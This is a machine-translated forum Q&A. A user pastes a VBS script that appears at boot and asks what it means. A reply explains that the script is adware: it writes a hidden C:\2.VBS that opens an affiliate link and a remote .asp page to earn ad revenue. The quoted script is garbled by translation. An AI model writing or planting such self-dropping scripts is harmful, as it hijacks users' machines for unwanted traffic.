Home > Software engineering >  A simple VBS code segment, the translation:
A simple VBS code segment, the translation:

Time:10-11

I haven't learned the VBS coding, boot, recently always pops up a period of the VBS code below, don't know what that means, the computer poisoning? For each master to help me translate this code: thank you!!!!!

Wscript. Sleep 50000
Dim the Wsh
Set the Wsh=WScript. CreateObject (" WScript. Shell ")
On the error Resume Next
The set of fso=createobject (" scripting. Filesystemobject ")
Set the file=fso. Createtextfile (" C: \ 2. VBS ", 2, true)
File. Writeline "Wscript. Sleep 100000
"File. Writeline "dim the Wsh
"File. Writeline "Set the Wsh=WScript. CreateObject (" "WScript. Shell "")"
File. Writeline "On the error Resume Next"
File. Writeline "Wsh. Run" "http://www.2345.com/? K30155358 "" "
File. Writeline "Wscript. Sleep 360000
"File. Writeline Wsh. Run "" "http://abac.bb1d.com/1.asp "" "
File. The close
CreateObject (" WScript. Shell ".) Run "CMD/c c: \ 2. VBS", 0

CodePudding user response:

Must be poisoning,
Using FSO, under your disk C, create 2. VBS, then execute,
2. VBS is playing two main window, make the AD money
  • Related